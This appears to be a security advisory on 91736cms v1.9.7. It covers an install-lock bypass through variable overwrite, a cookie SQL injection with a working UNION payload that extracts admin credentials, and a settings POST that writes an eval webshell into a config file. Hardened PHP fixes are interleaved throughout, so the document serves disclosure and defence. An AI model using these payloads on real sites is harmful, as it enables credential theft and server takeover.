91736cms variable-overwrite reinstall vulnerability && front-end SQL injection, back-end config-file write getshell

91736cms_v1.9.7

1. Affected file: 91736cms/install/index.php, lines 8 to 27:

$insLockfile = dirname(__FILE__).'/install_lock.txt';
define('CMS_ROOT',ereg_replace("[\\/]install",'',dirname(__FILE__)));
define('CMS_DATA',CMS_ROOT.'/data/');
header("Content-Type: text/html; charset={$lang}");

// Every GET/POST/COOKIE key becomes a global variable of the same name,
// so a request parameter can overwrite $insLockfile defined above.
foreach(Array('_GET','_POST','_COOKIE') as $_request){
    foreach($$_request as $_k => $_v) ${$_k} = _runmagicquotes($_v);
}

function _runmagicquotes(&$svar){
    if(!get_magic_quotes_gpc()){
        if( is_array($svar) ){
            foreach($svar as $_k => $_v) $svar[$_k] = _runmagicquotes($_v);
        }else{
            $svar = addslashes($svar);
        }
    }
    return $svar;
}

// The lock check runs after the overwrite loop, so it tests whatever path
// the request supplied.
if(file_exists($insLockfile)){
    exit(" 程序已运行安装,如果你确定要重新安装,请先从FTP中删除 install/install_lock.txt!");
}

1.1 Every key in GET, POST and COOKIE is copied into a same-named variable, which is a variable-overwrite vulnerability. Because the install-lock check runs after that loop, setting $insLockfile to a filename that does not exist bypasses the check and allows the program to be reinstalled.
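For comparison, the following is an added example of how the install guard can be written so that request data cannot reach the lock path. It is not 91736cms code; the function names are assumptions, and the lock path is derived from __DIR__ instead of the ereg_replace() call (removed in PHP 7) used by the original.

```php
<?php
// Added example (not 91736cms code): a hardened install guard.
// Request values are read through an explicit accessor instead of being
// copied into the global scope, so $insLockfile can only be set here.

function install_lock_path(): string
{
    // Computed from the script location, never from user input.
    return __DIR__ . '/install_lock.txt';
}

function request_string(string $key, string $default = ''): string
{
    // Allowlisted access: the caller names the key it wants; no key in
    // $_GET/$_POST/$_COOKIE ever becomes a variable on its own.
    $v = $_POST[$key] ?? $_GET[$key] ?? $default;
    return is_string($v) ? $v : $default;
}

function assert_not_installed(string $lockFile): void
{
    if (file_exists($lockFile)) {
        header('HTTP/1.1 403 Forbidden');
        exit('Installation is locked. Remove install/install_lock.txt via FTP to reinstall.');
    }
}

// Demonstration with a constructed request: a parameter named insLockfile
// has no effect, because the checked path is never taken from the request.
$_GET['insLockfile'] = 'does_not_exist.txt';   // constructed hostile input
assert_not_installed(install_lock_path());       // still checks the real lock
echo 'lock path in use: ' . install_lock_path() . "\n";
echo 'sitename from request: ' . request_string('sitename', '(none)') . "\n";
```

The same pattern applies to the rest of the installer: any value that must come from the request is fetched by name, and nothing that controls file paths or the lock state is ever read from a global that the request can populate.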

2. Affected file: 91736cms/system/modules/member, lines 203 to 212:

private function member_info(){
    if(empty($_COOKIE['member_user'])||empty($_COOKIE['member_userid'])){
        showmsg(C("admin_not_exist"),"index.php?m=member&f=login");
    }
    $user=$_COOKIE['member_user'];
    $userid=$_COOKIE['member_userid'];
    // $userid is taken straight from the cookie and concatenated into the query.
    $info=$this->mysql->get_one("select * from ".DB_PRE."member where `userid`=$userid");
    assign('member',$info);
}

2.1 The member-login check reads its values directly from cookies, and member_userid is concatenated into the SQL query without any filtering, so supplying the two cookie values gives a direct cookie-based SQL injection.

Exploit:

Cookie: member_user=testtest; member_userid=-1 union select 1,2,concat_ws(0x20,id,username,password),4,5,6,7,null,null,10,11,12,13,14 from c_admin
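The two defects in member_info() are that identity is taken from client-controlled cookies and that the id is interpolated into SQL. The following added example (not 91736cms code) shows the lookup done with a server-side session and a bound parameter. It assumes a PDO connection; the in-memory SQLite table and the DB_PRE prefix value are constructed for the demonstration.

```php
<?php
// Added example (not 91736cms code): member lookup that does not trust
// cookie-supplied identity and binds the id as a typed parameter.

define('DB_PRE', 'c_');   // table prefix, matching the page's DB_PRE usage

function member_info(PDO $db, array $session): ?array
{
    // Identity comes from the server-side session, which the client cannot
    // rewrite, not from member_user / member_userid cookies.
    if (!isset($session['member_userid']) || !is_int($session['member_userid'])) {
        return null;   // caller redirects to index.php?m=member&f=login
    }
    // For MySQL, also set PDO::ATTR_EMULATE_PREPARES => false so the server
    // performs the binding; SQLite binds natively.
    $stmt = $db->prepare('SELECT * FROM ' . DB_PRE . 'member WHERE userid = :id');
    $stmt->bindValue(':id', $session['member_userid'], PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE c_member (userid INTEGER PRIMARY KEY, username TEXT)');
$db->exec("INSERT INTO c_member VALUES (1, 'alice')");

var_dump(member_info($db, ['member_userid' => 1])['username']);          // string(5) "alice"
// A string of the shape used in the cookie payload above never reaches the
// database: it fails the integer check before any SQL is prepared.
var_dump(member_info($db, ['member_userid' => '-1 union select 1']));    // NULL
var_dump(member_info($db, []));                                          // NULL (not logged in)
```

The integer check is the cheap first line; the prepared statement is what makes the query safe even if a non-integer value ever slipped through the session layer.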

3. Back-end configuration-file write leading to getshell

Capture the save request from System Settings - Site Configuration - Basic Settings. The settings are written to two configuration files, 91736cms/system/91736.inc.php and 91736cms/cache/cache_sys/cache_set_config.php. The first file does not filter the parameters, so a one-line webshell can be written into it directly to get a shell.

POC:

POST /index.php?m=91736&c=setting&f=save

sitename=91736&siteurl=http%3A%2F%2F127.0.0.1%2F&logourl=uploadfile%2Fimage%2F20111120%2F20111120085030.jpg&template=default12&caching=false);%0a%20@eval($_GET[a]&webstate1=%CD%F8%D5%BE%CE%AC%BB%A4%D6%D0…&copyright=%C4%CF%C4%FE%D0%F1%B6%AB%CD%F8%C2%E7%BF%C6%BC%BC%D3%D0%CF%DE%B9%AB%CB%BE+20112+%B0%E6%C8%A8%CB%F9%D3%D0+%B9%F0ICP%B1%B803023960%BA%C5+%B5%E7%BB%B0%A3%BA0086-888-88888888%3Cbr%3ECopyright+2012+XuDong+network+technology+Co.%2C+LT&createhtml=0&title=91736%C6%F3%D2%B5%CD%F8%D5%BE%B9%DC%C0%ED%CF%B5%CD%B3&keywords=%C6%F3%D2%B5%CD%F8%D5%BE%CF%B5%CD%B3aaa&description=91736%C6%F3%D2%B5%CD%F8%D5%BE%B9%DC%C0%ED%CF%B5%CD%B3%CA%C7%D3%C991736%CD%C5%B6%D3%B6%C0%C1%A2%BF%AA%B7%A2%B5%C4%C6%F3%D2%B5%CD%F8%D5%BE%B9%DC%C0%ED%CF%B5%CD%B3&tag=config&submit=+%B1%A3+%B4%E6+

Then execute phpinfo();
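The root cause is that the settings controller splices raw POST values into PHP source. The following added example (not 91736cms code) shows a config writer that validates each field against an allowlist and generates the file with var_export(), so no value can close its string literal. The field names follow the POST parameters in the PoC above; the validation rules and function names are assumptions.

```php
<?php
// Added example (not 91736cms code): writing settings to a PHP config file
// without letting any value escape its string literal.

function validate_settings(array $post): array
{
    $rules = [
        'sitename'    => fn($v) => is_string($v) && mb_strlen($v) <= 100,
        'siteurl'     => fn($v) => is_string($v) && filter_var($v, FILTER_VALIDATE_URL) !== false,
        'template'    => fn($v) => is_string($v) && preg_match('/^[A-Za-z0-9_-]+$/', $v) === 1,
        'caching'     => fn($v) => $v === 'true' || $v === 'false',   // strict allowlist
        'createhtml'  => fn($v) => $v === '0' || $v === '1',
        'title'       => fn($v) => is_string($v) && mb_strlen($v) <= 200,
        'keywords'    => fn($v) => is_string($v) && mb_strlen($v) <= 500,
        'description' => fn($v) => is_string($v) && mb_strlen($v) <= 1000,
    ];
    $clean = [];
    foreach ($rules as $key => $ok) {
        $v = $post[$key] ?? '';
        if (!$ok($v)) {
            throw new InvalidArgumentException("setting '$key' rejected");
        }
        $clean[$key] = $v;
    }
    return $clean;   // unknown POST keys are dropped, not written
}

function render_config(array $settings): string
{
    // var_export() emits a valid PHP array literal with every string quoted
    // and escaped, so a value such as "false);\n@eval(...)" stays inside quotes.
    return "<?php\nreturn " . var_export($settings, true) . ";\n";
}

function write_config_atomically(string $path, string $php): void
{
    // Write to a temp file and rename into place so the running site never
    // includes a half-written config.
    $tmp = $path . '.tmp';
    if (file_put_contents($tmp, $php, LOCK_EX) === false) {
        throw new RuntimeException("cannot write $tmp");
    }
    rename($tmp, $path);
}

// Constructed request mirroring the PoC: the caching value is rejected by the
// allowlist before anything reaches disk.
$hostile = [
    'sitename' => '91736', 'siteurl' => 'http://127.0.0.1/', 'template' => 'default12',
    'caching' => "false);\n @eval(\$_GET[a]", 'createhtml' => '0',
    'title' => 't', 'keywords' => 'k', 'description' => 'd',
];
try {
    validate_settings($hostile);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";   // setting 'caching' rejected
}

// Even a free-text field that passes validation is emitted as a quoted literal:
echo render_config(['sitename' => "x'); @eval(1", 'caching' => 'false']);
```

Two checks worth keeping in a review of any CMS that regenerates PHP from settings: the generated file should be produced by var_export() or json_encode(), never by string concatenation, and the directory it lives in should not be writable by the web-server user in normal operation.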
